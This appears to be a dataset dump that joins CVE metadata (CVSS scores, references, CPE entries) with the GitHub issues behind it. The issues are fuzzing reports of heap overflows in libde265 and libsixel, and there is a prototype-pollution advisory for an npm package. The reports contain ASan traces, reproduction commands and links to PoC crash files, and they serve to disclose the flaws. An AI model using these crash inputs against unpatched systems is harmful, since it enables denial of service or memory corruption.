# heap-buffer-overflow in decode file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# /opt/asan/bin/dec265 libde265-mm_loadl_epi64-heap_overflow.crash WARNING: maximum number of reference pictures exceeded WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: coded parameter out of range WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: maximum number of reference pictures exceeded WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: faulty reference picture list ================================================================= ==129719==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62b000068560 at pc 0x0000004d0359 bp 0x7ffe48aefc20 sp 0x7ffe48aefc10 READ of size 8 at 0x62b000068560 thread T0 #0 0x4d0358 in _mm_loadl_epi64(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/5/include/emmintrin.h:704 #1 0x4d0358 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*) /root/src/libde265/libde265/x86/sse-motion.cc:987 #2 0x52bf76 in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:296 #3 0x52dc7a in void mc_chroma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:205 #4 0x51f88a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:382 #5 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #6 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310 #7 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #8 0x47b611 in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4636 #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #20 0x7f56cd48d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #21 0x402b28 in _start (/opt/asan/bin/dec265+0x402b28) 0x62b000068560 is located 80 bytes to the right of 25360-byte region [0x62b000062200,0x62b000068510) allocated by thread T0 here: #0 0x7f56ce38e076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418 #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648 #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066 #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7f56cd48d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/5/include/emmintrin.h:704 _mm_loadl_epi64(long long __vector(2) const*) Shadow bytes around the buggy address: 0x0c5680005050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c56800050a0: 00 00 fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa 0x0c56800050b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==129719==ABORTING ``` ## POC file [libde265-mm_loadl_epi64-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-mm_loadl_epi64-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in decode file
https://api.github.com/repos/strukturag/libde265/issues/231/comments
3
2019-12-24T03:25:24Z
2023-01-24T17:40:29Z
https://github.com/strukturag/libde265/issues/231
541,973,882
231
2,505
CVE-2020-21606
2021-09-16T22:15:08.177
libde265 v1.0.4 contains a heap buffer overflow fault in the put_epel_16_fallback function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/232" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/232" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/232
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in put_epel_16_fallback when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# /opt/asan/bin/dec265 libde265-put_epel_16_fallback-heap_overflow.crash WARNING: CTB outside of image area (concealing stream error...) WARNING: pps header invalid WARNING: faulty reference picture list WARNING: pps header invalid ================================================================= ==39540==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62b00001b510 at pc 0x000000433086 bp 0x7ffd99655f60 sp 0x7ffd99655f50 READ of size 2 at 0x62b00001b510 thread T0 #0 0x433085 in put_epel_16_fallback(short*, long, unsigned short const*, long, int, int, int, int, short*, int) /root/src/libde265/libde265/fallback-motion.cc:289 #1 0x52bfe0 in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:298 #2 0x52dc7a in void mc_chroma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:205 #3 0x51f88a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:382 #4 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #5 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310 #6 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #7 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #8 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #9 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #10 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #11 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #12 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #13 0x40e23e in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1329 #14 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #15 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #16 0x7fa1b901182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x402b28 in _start (/opt/asan/bin/dec265+0x402b28) 0x62b00001b510 is located 0 bytes to the right of 25360-byte region [0x62b000015200,0x62b00001b510) allocated by thread T0 here: #0 0x7fa1b9f12076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418 #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648 #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066 #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7fa1b901182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:289 put_epel_16_fallback(short*, long, unsigned short const*, long, int, int, int, int, short*, int) Shadow bytes around the buggy address: 0x0c567fffb650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fffb660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fffb670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fffb680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fffb690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c567fffb6a0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==39540==ABORTING ``` ## POC file [libde265-put_epel_16_fallback-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_epel_16_fallback-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in put_epel_16_fallback when decoding file
https://api.github.com/repos/strukturag/libde265/issues/232/comments
5
2019-12-24T08:22:59Z
2023-01-24T17:39:38Z
https://github.com/strukturag/libde265/issues/232
542,041,601
232
2,506
CVE-2021-23442
2021-09-17T10:15:07.437
This affects all versions of package @cookiex/deep. The global proto object can be polluted using the __proto__ object.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.7, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tony-tsx/cookiex-deep/commit/b5bea2b7f34a5fa9abb4446cbd038ecdbcd09c88" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/tony-tsx/cookiex-deep/issues/1" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-COOKIEXDEEP-1582793" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tony-tsx/cookiex-deep/commit/b5bea2b7f34a5fa9abb4446cbd038ecdbcd09c88" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/tony-tsx/cookiex-deep/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-COOKIEXDEEP-1582793" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cookiex-deep_project:cookiex-deep:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "F007AA1F-4D44-4CAE-8BF5-CA7707EDB1B1", "versionEndExcluding": "0.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/tony-tsx/cookiex-deep/issues/1
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "tony-tsx", "cookiex-deep" ]
[@cookiex/deep](https://www.npmjs.com/package/@cookiex/deep) npm package is vulnerable to **prototype pollution** vulnerability prior to version 0.0.6.
@cookiex/deep npm package is vulnerable to prototype pollution vulnerability prior to version 0.0.6.
https://api.github.com/repos/tony-tsx/cookiex-deep/issues/1/comments
0
2021-09-06T06:29:37Z
2021-09-14T12:21:35Z
https://github.com/tony-tsx/cookiex-deep/issues/1
988,815,265
1
2,507
CVE-2020-21547
2021-09-17T21:15:07.313
Libsixel 1.8.2 contains a heap-based buffer overflow in the dither_func_fs function in tosixel.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/114" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/114" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.2:*:*:*:*:*:*:*", "matchCriteriaId": "BAFCC979-2F4E-46A5-AC18-B6452E752D90", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/saitoha/libsixel/issues/114
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
version : img2sixel 1.8.2 There is a heap-buffer-overflow in dither_func_fs at tosixel.c:861 please run following cmd to reproduce it. ``` img2sixel --high-color $PoC ``` [poc](https://drive.google.com/file/d/1Zbn3EFlTBY7dBozOSegrchWQ0F8MEO7I/view?usp=sharing) ASAN LOG ``` ==39700==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fcc6219e808 at pc 0x7fcc6ad13008 bp 0x7ffe2a935b70 sp 0x7ffe2a935b68 READ of size 1 at 0x7fcc6219e808 thread T0 #0 0x7fcc6ad13007 in dither_func_fs /home/tmp/libsixel/src/tosixel.c:861:9 #1 0x7fcc6ad13007 in sixel_apply_15bpp_dither /home/tmp/libsixel/src/tosixel.c:1223 #2 0x7fcc6ad13007 in sixel_encode_highcolor /home/tmp/libsixel/src/tosixel.c:1334 #3 0x7fcc6ad13007 in sixel_encode /home/tmp/libsixel/src/tosixel.c:1485 #4 0x7fcc6b0478a4 in sixel_encoder_output_without_macro /home/tmp/libsixel/src/encoder.c:820:14 #5 0x7fcc6b0478a4 in sixel_encoder_encode_frame /home/tmp/libsixel/src/encoder.c:1050 #6 0x7fcc6adfdd91 in sixel_helper_load_image_file /home/tmp/libsixel/src/loader.c:913:14 #7 0x7fcc6b03fd4f in sixel_encoder_encode /home/tmp/libsixel/src/encoder.c:1737:14 #8 0x51787f in main /home/tmp/libsixel/converters/img2sixel.c:457:22 #9 0x7fcc693a2b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #10 0x41a379 in _start (/home/tmp/img2sixel+0x41a379) 0x7fcc6219e808 is located 0 bytes to the right of 573448-byte region [0x7fcc62112800,0x7fcc6219e808) allocated by thread T0 here: #0 0x4da230 in __interceptor_malloc (/home/tmp/img2sixel+0x4da230) #1 0x7fcc6acfcc7f in sixel_encode_highcolor /home/tmp/libsixel/src/tosixel.c:1309:40 #2 0x7fcc6acfcc7f in sixel_encode /home/tmp/libsixel/src/tosixel.c:1485 #3 0x7fcc6b0478a4 in sixel_encoder_output_without_macro /home/tmp/libsixel/src/encoder.c:820:14 #4 0x7fcc6b0478a4 in sixel_encoder_encode_frame /home/tmp/libsixel/src/encoder.c:1050 #5 0x7fcc6adfdd91 in sixel_helper_load_image_file /home/tmp/libsixel/src/loader.c:913:14 #6 0x7fcc6b03fd4f in sixel_encoder_encode /home/tmp/libsixel/src/encoder.c:1737:14 #7 0x51787f in main /home/tmp/libsixel/converters/img2sixel.c:457:22 #8 0x7fcc693a2b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tmp/libsixel/src/tosixel.c:861:9 in dither_func_fs Shadow bytes around the buggy address: 0x0ffa0c42bcb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffa0c42bcc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffa0c42bcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffa0c42bce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffa0c42bcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ffa0c42bd00: 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffa0c42bd10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffa0c42bd20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffa0c42bd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffa0c42bd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffa0c42bd50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==39700==ABORTING ```
heap-buffer-overflow in dither_func_fs at tosixel.c:861
https://api.github.com/repos/saitoha/libsixel/issues/114/comments
1
2019-12-13T13:53:59Z
2019-12-16T14:40:25Z
https://github.com/saitoha/libsixel/issues/114
537,562,433
114
2,508
CVE-2020-21548
2021-09-17T21:15:07.360
Libsixel 1.8.3 contains a heap-based buffer overflow in the sixel_encode_highcolor function in tosixel.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/116" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.3:*:*:*:*:*:*:*", "matchCriteriaId": "75488CEA-3C52-4C9C-97F2-83B652FD701D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/saitoha/libsixel/issues/116
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
